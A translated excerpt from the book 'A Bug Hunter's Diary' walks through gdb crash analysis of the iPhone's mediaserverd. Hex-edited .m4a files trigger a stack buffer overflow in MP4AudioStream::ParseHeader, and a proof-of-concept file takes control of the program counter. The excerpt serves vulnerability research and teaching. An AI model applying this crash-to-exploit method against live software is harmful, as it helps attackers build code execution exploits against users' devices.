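Note from the Turing Community

What is TEAP? TEAP is short for Turingbook Early Access Program, an early-reading program that publishes unedited content from Turing books that are still in production. Translating a book takes roughly three to six months, and the quality of the translation benefits when the translator can talk with readers along the way. Through TEAP, readers get to read content before it is published, and translators receive valuable feedback that helps them improve the translation.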

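The book's original title is A Bug Hunter's Diary; its working Chinese title is 《捉虫日记》.
This excerpt is taken from Section 2 of Chapter 8.
Comments and suggestions are very welcome; you can reach me on Weibo at @loveisbug.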

Previous part: A Bug Hunter's Diary, "The Ringtone Massacre" (1)

The Ringtone Massacre

8.2 Crash Analysis and Exploitation

After the fuzzer had finished processing all the test cases, I searched the web server's access log for "BUG_FOUND" entries.

linux$ grep BUG /var/log/apache2/access.log
192.168.99.103 .. "GET /BUG_FOUND_file40.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0
(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
192.168.99.103 .. "GET /BUG_FOUND_file41.m4a HTTP/1.1" 404 276 "-" "Mozilla/5.0
(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
192.168.99.103 .. "GET /BUG_FOUND_file42.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0
(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,
like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
[..]
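The same search can be sketched in Python when the list of crashing test cases is needed for later scripting. This is only an illustration: the function name `crashed_test_cases` and the regular expression are assumptions based on the request paths visible in the log excerpt above, not part of the original tooling.

```python
import re

# Matches request paths such as "GET /BUG_FOUND_file40.m4a HTTP/1.1".
# The pattern is an assumption derived from the log excerpt above.
BUG_REQUEST = re.compile(r'"GET /BUG_FOUND_(file\d+\.m4a) ')


def crashed_test_cases(log_lines):
    """Return the test case file names named in BUG_FOUND requests, in order, without duplicates."""
    found = []
    for line in log_lines:
        match = BUG_REQUEST.search(line)
        if match and match.group(1) not in found:
            found.append(match.group(1))
    return found


sample = [
    '192.168.99.103 .. "GET /BUG_FOUND_file40.m4a HTTP/1.1" 404 277 "-" "Mozilla/5.0',
    '(iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML,',
    '192.168.99.103 .. "GET /BUG_FOUND_file41.m4a HTTP/1.1" 404 276 "-" "Mozilla/5.0',
]
print(crashed_test_cases(sample))
```

For a real log, the lines could be read with `open("/var/log/apache2/access.log")` and passed to the same function.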

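As the log excerpt shows, mediaserverd ran into an error while trying to play test case files 40, 41, and 42. To analyze the crashes, I rebooted the phone and attached the GNU debugger (see Appendix B.4) to mediaserverd:

Like most mobile devices, the iPhone uses an ARM CPU. This matters because ARM assembly language differs considerably from Intel assembly.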

iphone# uname -a
Darwin localhost 9.4.1 Darwin Kernel Version 9.4.1: Mon Dec 8 20:59:30 PST 2008;
root:xnu-1228.7.37~4/RELEASE_ARM_S5L8900X iPhone1,1 arm M68AP Darwin

iphone# id
uid=0(root) gid=0(wheel)

iphone# gdb -q

After starting gdb, I used the following command to find the current process ID of mediaserverd:

(gdb) shell ps -u mobile -O pid | grep mediaserverd
27 ?? Ss 0:01.63 /usr/sbin/mediaserverd

I then loaded the mediaserverd binary into the debugger and attached the debugger to the process:

(gdb) exec-file /usr/sbin/mediaserverd
Reading symbols for shared libraries ......... done

(gdb) attach 27
Attaching to program: `/usr/sbin/mediaserverd', process 27.
Reading symbols for shared libraries ................................. done
0x3146baa4 in mach_msg_trap ()

Before resuming mediaserverd, I used the follow-fork-mode setting to tell the debugger to follow the child process rather than the parent:

(gdb) set follow-fork-mode child

(gdb) continue
Continuing.

I opened mobile Safari on the phone and pointed it at the URL of test case file 40 (file40.m4a). The debugger produced the following output:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x01302000
[Switching to process 27 thread 0xa10b]
0x314780ec in memmove ()

The crash occurred when mediaserverd tried to access memory at address 0x01302000.

(gdb) x/1x 0x01302000
0x1302000: Cannot access memory at address 0x1302000

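As the debugger output shows, mediaserverd crashed while trying to reference an unmapped memory location. To analyze the crash further, I printed the current call stack: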

(gdb) backtrace
#0 0x314780ec in memmove ()
#1 0x3493d5e0 in MP4AudioStream::ParseHeader ()
#2 0x00000072 in ?? ()
Cannot access memory at address 0x72

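This output is interesting. The address of stack frame #2 has an unusual value (0x00000072), which suggests that the stack has been corrupted. I used the following command to print the last instruction executed in MP4AudioStream::ParseHeader() (see stack frame #1):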

(gdb) x/1i 0x3493d5e0 - 4
0x3493d5dc <_ZN14MP4AudioStream11ParseHeaderER27AudioFileStreamContinuation+1652>:
bl 0x34997374 <dyld_stub_memcpy>

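The last instruction executed in MP4AudioStream::ParseHeader() was a call to memcpy(), which must have caused the crash. At this point, the bug showed all the characteristics of a stack buffer overflow vulnerability (see Appendix A.1).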

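I stopped the debugging session and rebooted the device. After the phone had restarted, I attached the debugger to mediaserverd again, and this time I also set a breakpoint at the memcpy() call in MP4AudioStream::ParseHeader() so that I could examine the arguments passed to memcpy():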

(gdb) break *0x3493d5dc
Breakpoint 1 at 0x3493d5dc

(gdb) continue
Continuing.

I opened test case 40 (file40.m4a) in mobile Safari to trigger the breakpoint:

[Switching to process 27 thread 0x9c0b]

Breakpoint 1, 0x3493d5dc in MP4AudioStream::ParseHeader ()

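The arguments of memcpy() are normally passed in registers r0 (destination buffer), r1 (source buffer), and r2 (number of bytes to copy). I asked the debugger for the current values of these registers: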

(gdb) info registers r0 r1 r2
r0 0x684a38 6834744
r1 0x115030 1134640
r2 0x1fd0 8144

I also inspected the data that r1 points to, to see whether the source data of memcpy() is user controllable:

(gdb) x/40x $r1
0x115030:     0x00000000 0xd7e178c2 0xe5e178c2 0x80bb0000
0x115040:     0x00b41000 0x00000100 0x00000001 0x00000000
0x115050:     0x00000000 0x00000100 0x00000000 0x00000000
0x115060:     0x00000000 0x00000100 0x00000000 0x00000000
0x115070:     0x00000000 0x00000040 0x00000000 0x00000000
0x115080:     0x00000000 0x00000000 0x00000000 0x00000000
0x115090:     0x02000000 0x2d130000 0x6b617274 0x5c000000
0x1150a0:     0x64686b74 0x07000000 0xd7e178c2 0xe5e178c2
0x1150b0:     0x01000000 0x00000000 0x00b41000 0x00000000
0x1150c0:     0x00000000 0x00000000 0x00000001 0x00000100

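I then searched test case file 40 for these values and found them right at the beginning of the file. The debugger displays memory as little-endian 32-bit words, so the bytes of each word appear in reverse order in the file: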

[..]
00000030h: 00 00 00 00 C2 78 E1 D7 C2 78 E1 E5 00 00 BB 80 ; ....Âxá×Âxáå..»€
00000040h: 00 10 B4 00 00 01 00 00 01 00 00 00 00 00 00 00 ; ..´.............
00000050h: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 ; ................
00000060h: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 ; ................
00000070h: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 ; ....@...........
[..]
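The byte-order conversion behind this search can be sketched as follows. The helper name `word_to_file_bytes` is hypothetical; the words are the first four values from the `x/40x $r1` output, and the expected byte sequence is the one visible at offset 0x30 in the hex dump above.

```python
import struct


def word_to_file_bytes(word):
    """Return the four bytes of a 32-bit word as they are laid out in little-endian memory."""
    return struct.pack("<I", word)


# First four words printed by the debugger at address 0x115030.
words = [0x00000000, 0xD7E178C2, 0xE5E178C2, 0x80BB0000]
pattern = b"".join(word_to_file_bytes(w) for w in words)

# Prints the byte sequence to look for in the test case file.
print(pattern.hex(" "))
```

With the file contents loaded into a bytes object, `data.find(pattern)` would return the offset of the first match, or -1 if the pattern is absent.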

So I could control the source data of the memory copy. I continued the execution of mediaserverd and got the following output in the debugger:

(gdb) continue
Continuing.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00685000
0x314780ec in memmove ()
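The fault address can be checked against the memcpy() arguments captured at the breakpoint. The arithmetic below is a minimal sketch that uses only the register values and the fault address from the debugger output; the 4 KiB page size is an assumption, and the variable names are chosen for illustration.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB memory pages

dest = 0x684A38    # r0: destination buffer
count = 0x1FD0     # r2: number of bytes to copy
fault = 0x00685000  # address reported with KERN_PROTECTION_FAILURE

copy_end = dest + count            # first address past the requested copy
bytes_before_fault = fault - dest  # bytes written before the faulting address

print(hex(copy_end))        # where the copy would have ended
print(bytes_before_fault)   # how much was copied before the fault
print(fault % PAGE_SIZE == 0, dest < fault < copy_end)
```

The requested copy would end at 0x686a08, well past the faulting address, and the fault sits on a page boundary inside the destination range. That is consistent with a copy that runs off the end of the mapped stack memory.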

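mediaserverd crashed again while trying to access unmapped memory. It seems that the size argument passed to memcpy() is too big, so the function tries to copy audio file data past the end of the stack. At this point I stopped the debugger and opened the test case file that had caused the crash (file40.m4a) in a hex editor: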

00000000h: 00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00 ; ... ftypM4A ....
00000010h: 4D 34 41 20 6D 70 34 32 69 73 6F 6D 00 00 00 00 ; M4A mp42isom....
00000020h: 00 00 1C 65 6D 6F 6F 76 FF 00 00 6C 6D 76 68 64 ; ...emoovÿ..lmvhd
[..]

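The manipulated byte (0xff) that caused the crash is at file offset 40 (0x28). I consulted the QuickTime File Format Specification (see note 7) to determine the role of that byte within the file structure. According to the specification, the byte is part of the atom size of a movie header atom, so the fuzzer must have changed the size value of that atom. As I mentioned before, the size passed to memcpy() is too big, so mediaserverd crashed while trying to copy too much data onto the stack. To avoid the crash, I set the atom size to a smaller value: I changed the manipulated byte at file offset 40 back to 0x00 and set the byte at offset 42 to 0x02.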

Here is the original test case file 40 (file40.m4a):

00000020h: 00 00 1C 65 6D 6F 6F 76 FF 00 00 6C 6D 76 68 64 ; ...emoovÿ..lmvhd

And here is the new test case file (file40_2.m4a); the changed bytes are at offsets 40 (0x28) and 42 (0x2A):

00000020h: 00 00 1C 65 6D 6F 6F 76 00 00 02 6C 6D 76 68 64 ; ...emoov...lmvhd
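To see what these bytes mean, the row at file offset 0x20 can be decoded as atom headers. The sketch below assumes the basic QuickTime atom layout of a 32-bit big-endian size followed by a four-character type; the helper name `parse_atom_header` is hypothetical, and the two byte strings are the rows from file40.m4a and file40_2.m4a shown above.

```python
import struct


def parse_atom_header(data, offset):
    """Decode a (size, type) pair: 32-bit big-endian size, then a 4-character type."""
    size, kind = struct.unpack_from(">I4s", data, offset)
    return size, kind.decode("ascii")


# The 16 bytes at file offset 0x20 in each file.
fuzzed = bytes.fromhex("00001C656D6F6F76FF00006C6D766864")   # file40.m4a
patched = bytes.fromhex("00001C656D6F6F760000026C6D766864")  # file40_2.m4a

print(parse_atom_header(fuzzed, 0))   # enclosing atom at file offset 0x20
print(parse_atom_header(fuzzed, 8))   # movie header atom at file offset 0x28
print(parse_atom_header(patched, 8))  # same atom after the manual edit
```

In the fuzzed file the movie header atom claims a size of 0xFF00006C bytes; after the edit it claims 0x26C (620) bytes.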

I rebooted the device to get a clean environment, attached the debugger to mediaserverd again, and opened the new file in mobile Safari:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000072
[Switching to process 27 thread 0xa10b]
0x00000072 in ?? ()

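This time the program counter (instruction pointer) was manipulated to point to address 0x00000072. I stopped the debugging session and started a new one, again setting a breakpoint at the memcpy() call in MP4AudioStream::ParseHeader():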

(gdb) break *0x3493d5dc
Breakpoint 1 at 0x3493d5dc

(gdb) continue
Continuing.

When I opened the modified test case file file40_2.m4a in mobile Safari, the debugger produced the following output:

[Switching to process 71 thread 0x9f07]

Breakpoint 1, 0x3493d5dc in MP4AudioStream::ParseHeader ()

I printed the current call stack:

(gdb) backtrace
#0 0x3493d5dc in MP4AudioStream::ParseHeader ()
#1 0x3490d748 in AudioFileStreamWrapper::ParseBytes ()
#2 0x3490cfa8 in AudioFileStreamParseBytes ()
#3 0x345dad70 in PushBytesThroughParser ()
#4 0x345dbd3c in FigAudioFileStreamFormatReaderCreateFromStream ()
#5 0x345dff08 in instantiateFormatReader ()
#6 0x345e02c4 in FigFormatReaderCreateForStream ()
#7 0x345d293c in itemfig_assureBasicsReadyForInspectionInternal ()
#8 0x345d945c in itemfig_makeReadyForInspectionThread ()
#9 0x3146178c in _pthread_body ()
#10 0x00000000 in ?? ()

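The first stack frame in the list is the one I was looking for. I used the following command to display information about the current stack frame of MP4AudioStream::ParseHeader():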

(gdb) info frame 0
Stack frame at 0x1301c00:
pc = 0x3493d5dc in MP4AudioStream::ParseHeader(AudioFileStreamContinuation&); saved
pc 0x3490d748
called by frame at 0x1301c30
Arglist at 0x1301bf8, args:
Locals at 0x1301bf8, Saved registers:
r4 at 0x1301bec, r5 at 0x1301bf0, r6 at 0x1301bf4, r7 at 0x1301bf8, r8 at →
0x1301be0, sl at 0x1301be4, fp at 0x1301be8, lr at 0x1301bfc, pc at 0x1301bfc,
s16 at 0x1301ba0, s17 at 0x1301ba4, s18 at 0x1301ba8, s19 at 0x1301bac, s20 at →
0x1301bb0, s21 at 0x1301bb4, s22 at 0x1301bb8, s23 at 0x1301bbc,
s24 at 0x1301bc0, s25 at 0x1301bc4, s26 at 0x1301bc8, s27 at 0x1301bcc, s28 at →
0x1301bd0, s29 at 0x1301bd4, s30 at 0x1301bd8, s31 at 0x1301bdc

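The most interesting piece of information is the stack location where the program counter (pc register) is saved. As the debugger output shows, pc is saved at address 0x1301bfc on the stack (see "Saved registers").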

I then continued the execution of the process:

(gdb) continue
Continuing.

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000072
0x00000072 in ?? ()

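After the crash, I examined the stack location (memory address 0x1301bfc) where MP4AudioStream::ParseHeader() had saved the program counter and from which the function expects to restore it: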

(gdb) x/12x 0x1301bfc
0x1301bfc: 0x00000073 0x00000000 0x04000001 0x0400002d
0x1301c0c: 0x00000000 0x73747328 0x00000063 0x00000000
0x1301c1c: 0x00000002 0x00000001 0x00000017 0x00000001

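The debugger output shows that the saved instruction pointer was overwritten with the value 0x00000073. When the function tried to return to its caller, this manipulated value was loaded into the instruction pointer (pc register). Specifically, 0x00000072 rather than the file value 0x00000073 ended up in the instruction pointer because of the instruction alignment of the ARM CPU (instructions are aligned on 16-bit or 32-bit boundaries).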
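The effect of that alignment can be illustrated with a deliberately simplified model. It assumes that bit 0 of the value loaded into pc on return is not used as part of the instruction address, so it is cleared; the function name `pc_after_return` is hypothetical, and real ARM cores apply additional rules depending on the instruction set state.

```python
def pc_after_return(saved_value):
    """Simplified model: bit 0 of the restored value is dropped from the address."""
    return saved_value & ~1


print(hex(pc_after_return(0x00000073)))  # value found on the stack
print(hex(pc_after_return(0x44444444)))  # an already aligned value is unchanged
```

Under this model the stack value 0x73 yields 0x72, which matches the address reported in the crash.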

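This extremely simple fuzzer had indeed found a classic stack buffer overflow in the iPhone's audio libraries. I searched the test case file for the byte pattern from the debugger output and found the byte sequence at offset 500 (0x1F4) of file40_2.m4a: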

000001f0h: 18 73 74 74 73 00 00 00 00 00 00 00 01 00 00 04 ; .stts...........
00000200h: 2D 00 00 04 00 00 00 00 28 73 74 73 63 00 00 00 ; -.......(stsc...
00000210h: 00 00 00 00 02 00 00 00 01 00 00 00 17 00 00 00 ; ................

I then changed the four bytes at offset 500 (73 00 00 00 in the dump above) to 0x44444444 and named the new file poc.m4a:

000001f0h: 18 73 74 74 44 44 44 44 00 00 00 00 01 00 00 04 ; .sttDDDD........
00000200h: 2D 00 00 04 00 00 00 00 28 73 74 73 63 00 00 00 ; -.......(stsc...
00000210h: 00 00 00 00 02 00 00 00 01 00 00 00 17 00 00 00 ; ................
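A patch like this can also be scripted instead of being made by hand in a hex editor. The following is a minimal sketch: the helper name `overwrite` is hypothetical, and the sample data is a zero-filled stand-in for the first 0x1f0 bytes followed by the row at offset 0x1f0 from file40_2.m4a as shown above.

```python
def overwrite(data, offset, replacement):
    """Return a copy of data with the bytes at offset replaced, keeping the length unchanged."""
    end = offset + len(replacement)
    if offset < 0 or end > len(data):
        raise ValueError("replacement does not fit inside the data")
    return data[:offset] + replacement + data[end:]


# Stand-in for file40_2.m4a: zero padding up to 0x1f0, then the row from the dump.
row = bytes.fromhex("18737474730000000000000001000004")
original = bytes(0x1F0) + row

# Overwrite the four bytes at offset 500 with 0x44.
poc = overwrite(original, 500, b"\x44" * 4)
print(poc[0x1F0:0x200].hex(" "))
```

On the real file, the input would come from `open("file40_2.m4a", "rb").read()` and the result would be written to poc.m4a.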

I attached the debugger to mediaserverd again and opened the new file poc.m4a in mobile Safari. The debugger produced the following output:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44444444
[Switching to process 77 thread 0xa20f]
0x44444444 in ?? ()

(gdb) info registers
r0 0x6474613f 1685348671
r1 0x393fc284 960479876
r2 0xcb0 3248
r3 0x10b 267
r4 0x6901102 110104834
r5 0x1808080 25198720
r6 0x2 2
r7 0x74747318 1953788696
r8 0xf40100 15991040
r9 0x817a00 8485376
sl 0xf40100 15991040
fp 0x80808005 -2139062267
ip 0x20044 131140
sp 0x684c00 6835200
lr 0x1f310 127760
pc 0x44444444 1145324612
cpsr {0x60000010, n = 0x0, z = 0x1, c = 0x1, v = 0x0, q = 0x0, j = 0x0, ge
= 0x0, e = 0x0, a = 0x0, i = 0x0, f = 0x0, t = 0x0, mode = 0x10} {0x60000010, n
= 0, z = 1, c = 1, v = 0, q = 0, j = 0, ge = 0, e = 0, a = 0, i = 0, f = 0, t = 0,
mode = usr}

(gdb) backtrace
#0 0x44444444 in ?? ()
Cannot access memory at address 0x74747318

Yay! At this point I had full control over the program counter.